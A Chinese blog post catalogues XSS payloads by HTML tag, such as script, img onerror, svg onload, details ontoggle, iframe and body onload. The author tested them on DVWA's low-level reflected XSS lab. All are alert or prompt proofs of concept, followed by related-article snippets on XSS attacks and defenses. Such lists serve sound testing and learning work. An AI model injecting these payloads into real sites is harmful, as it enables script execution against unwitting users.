web安全---XSS漏洞之标签使用2

最新推荐文章于 2024-05-03 18:41:56 发布
最新推荐文章于 2024-05-03 18:41:56 发布
阅读量796 收藏 3
点赞数
分类专栏: WEB安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41683305/article/details/114266155
版权

所有标签已经测试完并可以使用,测试环境:DVWA的反射型XSS,等级low

0x01 <script>标签
<script>alert(2)</script>
<script>alert(2)</script//
0x02 <img>标签
<img src="x" onerror=alert(1)>;
<img src="1" onerror=eval("alert('xss')")>;
<img src=1 onmouseover=alert('xss')>
0x03 <a>标签
<a href="javascript:alert('xss')">aa</a>
<a href=javascript:eval(alert('xss'))>aa</a>
0x04 input标签
<input value="" onclick=alert('xss') type="text">
<input name="name" value="" onmouseover=prompt('xss') bad="">
0x05 svg标签
<svg onload=alert(1)>
0x06 details标签
<details ontoggle="alert('xss');">
<details open ontoggle="alert('xss');">
0x07 select标签
<select onfocus=alert(1)></select>
<select onfocus=alert(1) autofocus>
0x08 iframe标签
<iframe onload=alert("xss");></iframe>
0x09 video标签
<video><source onerror="alert(1)">
0x0A audio标签
<audio src=x onerror=alert("xss");>
0x0B body标签
<body/onload=alert("xss");>
0x0C textarea标签
<textarea onfocus=alert("xss"); autofocus>

-------------------------------------------------------------
目前只有这么多,以后继续加

p0inter
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB安全XSS漏洞
无远弗届
03-13 567
跨站脚本攻击(Cross Site Scripting)。这是一种将恶意Javascript代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。自1996年诞生以来,如今已经历十多年的演化。由于和另一种网页技术-层叠样式表(Cascading Style Sheets,CSS)的缩写一样,为了防止混淆,故把原本的CSS简称为XSS。在各种WEB应用安全漏洞中,XSS跨站脚本攻击漏洞一直被OW...
关于自定义标签引起的XSS
angry_program的博客
05-22 720
前言 在渗透测试XSS(跨站脚本攻击)漏洞的时候, 有一些网站为了防护XSS, 将所有可以禁止的tag、event都禁止了, 但这还不是绝对安全的, 如果网站会将自定义的标签写入网页的话, 还是可能引起XSS的, 也就是本文谈到的内容。 接下来以一个XSS靶场为例。 Fuzz 测试伊始, 当然是寻找waf允许的标签以及事件类型, 这里本人采用burpsuite的intruder来Fuzz, 看看是否存在某些tag或者event是可行的。 1. 设置一下需要Fuzz的参数, 注意需要在<.
2024年网络安全-跨站脚本攻击(XSS)的原理、攻击及防御_xss攻击
最新发布
2401_84266016的博客
05-03 985
跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意javascript代码(也可能包含html代码),当用户浏览网页之时,嵌入其中Web里面的javascript代码会被执行,从而达到恶意攻击用户的目的。XSS是攻击客户端,最终受害者是用户,当然,网站管理员也是用户之一。XSS漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是。
jsp自定义标签过滤XSS安全字符
jianjun2114的博客
04-18 893
1.创建自定义标签类 public class XssTag extends SimpleTagSupport { @Override public void doTag() throws JspException, IOException { } } 2.创建xss.tld文件,并注册标签类 <?xml version="1...
xss漏洞攻击 html 标签过滤 sql注入
疯子的专栏
04-25 3144
<br />xss漏洞<br />感觉xss被执行的条件: <br />如果我们没有把用户输入组合成html代码让ie去解释,那么xss就没有机会得到触发.<br />我得程序里面,要把用户的输入存到后台,然后后台会返回给前台,前台显示.前台显示的时候有可能xss<br />用户输入的东西被当成html代码执行,从而有机会执行用户自己的脚本,指令<br />sql漏洞<br />sql漏洞执行条件<br />用户输入被当成sql语句执行.<br /><br />XSS漏洞报告<br />http://www
前端学习案例-xss攻击和标签模板2
qq_41632427的博客
03-10 84
前端
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
4. **使用安全的编程模式**:例如在JavaScript中使用`DOMPurify`库清理用户输入,防止DOM型XSS。 5. **HTTPOnly Cookie**:设置Cookie的HTTPOnly属性,防止JavaScript脚本访问,减少会话劫持的风险。 **总结** `...
Web-安全渗透全套教程20XSS跨.zip
05-22
【标题】"Web-安全渗透全套教程20XSS跨.zip"揭示了这是一份关于Web安全渗透测试的教育资料,特别关注XSS(Cross-Site Scripting,跨站脚本攻击)这一主题。XSS是一种常见的网络安全漏洞,攻击者通过注入恶意脚本到...
web前端-Web应用前端安全策略研究及应用.pdf
06-20
跨站脚本(XSS)攻击是Web应用中最常见的安全漏洞之一,攻击者通过在网页上注入可执行的脚本,欺骗用户执行恶意操作。文档指出,可以利用Observer API来实时监测DOM的变化,一旦发现不安全的DOM操作,立即进行修正或...
第28天:WEB漏洞-XSS跨站之WAF绕过及安全修复1
08-03
WEB 漏洞-XSS 跨站之 WAF 绕过及安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
E077-PHP应用安全-针对存储型XSS漏洞安全开发.pdf
12-02
8. **使用安全框架**:使用经过安全审计的框架,如Laravel、Symfony等,它们内置了许多安全功能,可以帮助开发者编写更安全的代码。 通过以上措施,可以显著提高PHP应用的安全性,有效防御存储型XSS攻击。在实际...
html5 新标签xss,HTML5安全攻防详析之七:新标签攻击
weixin_39620578的博客
06-16 196
HTML5去掉了很多过时的标签,例如``和,同时又引入了许多有趣的新标签,例如``和``标签可以允许动态的加载音频和视频。HTML5引入的新标签包括`、、、、`等等,而这些标签又有一些有趣的属性,例如poster、autofocus、onerror、formaction、oninput,这些属性都可以用来执行javascript。这会导致XSS和CSRF跨域请求伪造。下面我们要讲到就是这些关键载体...
Javascript 输入框 xss注入 以及防范
Johnny Liao的博客
12-02 9105
注入 类似于sql注入,在输入内容上动手脚,然后造成标签闭合的现象,再写入恶意 的js; 例如: &lt;input type="text" value="$var"&gt; 输入的内容如果是 " onclick = "javascript_function()" &gt; 在遇到有字符限制的情况下,可以将两个input之间的内容注释掉, 再在之间构建恶意的js &lt;in...
如何获取提交后的input标签中的值_利用XSS获取用户明文账户密码
weixin_39821330的博客
12-03 360
我们知道在浏览器存在这样一个功能,当用户登录成功了一个网页后,浏览器会提示我们是否保存密码。如果我们点击同意,那么浏览器就会将账户及密码进行保存。当我们退出账户再次访问登录页面的时候,我们会发现浏览器已经将我们保存好了的账户及密码填写到了对应的输入框内。如图。那么浏览器是如何识别到这个网页并自动填充好密码的呢,首先,浏览器需要知道我们访问的这个域名是否有保存过账户及密码。然后他会去查询网...
XSS(跨站脚本攻击)漏洞理解
向上的"狼"的博客
07-16 2356
XSS(跨站脚本攻击)漏洞理解
XSS攻击
12-21 730
目录 1 什么是XSS攻击? 2 解决思路 3 实现代码 3.1 springBoot项目(推荐) 3.1.1 yml配置文件中设置xss参数 3.1.2 自定义XssHttpServletRequestWrapper 3.1.3 自定义XssFilter过滤器 3.1.4 自定义FilterConfig配置类 3.1.5 引用类 3.1.6 参考开源项目 3.2 springMvc项目 3.2.1 自定义XssHttpServletRequestWrapper 3.2.2 自..
怎么使用input执行xss攻击_XSS场景及修复方案总结
weixin_32562973的博客
01-16 4625
xss原理跨站脚本攻击(Cross Site Scripting),缩写为XSS。恶意攻击者往Web页面里插入恶意javaScript代码,当用户浏览该页之时,嵌入其中Web里面的javaScript代码会被执行,从而达到恶意攻击用户的目的。xss分类反射型存储型DOM型xss场景和防御1. 恶意数据出现在标签内<body> ...恶意数据 </body>漏洞代码Strin...
xss漏洞知识总结
ma963852的博客
04-14 5624
漏洞原理 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 未对用户的输入进行处理,浏览器将用户输入的内容当作脚本执行。恶意攻击者往Web页面里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码会被执行,从而达到恶意的特殊目的。是一种针对用户浏览器的攻击。 漏洞分类 Xss主要分为三种类型: (1)反射型 反射型xss又称非持久性xss,需要用户点击带有
Web安全攻防的学习——09—(XSS攻击方法:16种主要攻击类型和常见的使用类型)
weixin_42118531的博客
04-02 729
1、XSS攻击 实验环境介绍 地址:https://xss-quiz.int21h.jp/ 探测XSS过程 1.构造一个不会被识别为恶意代码的字符串提交到页面中 2.使用浏览器审查工具进行代码审查,寻找构造的字符串是否在页面中显示 1.1 闭合文本标签利用XSS 简单的payload <script>alert(document.domain);</script> ...
JAVA Web应用常见漏洞与修复建议
12-09
电子版-JAVA Web应用常见漏洞与修复建议, 博客地址:https://blog.csdn.net/qq877507054/article/details/134491269

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值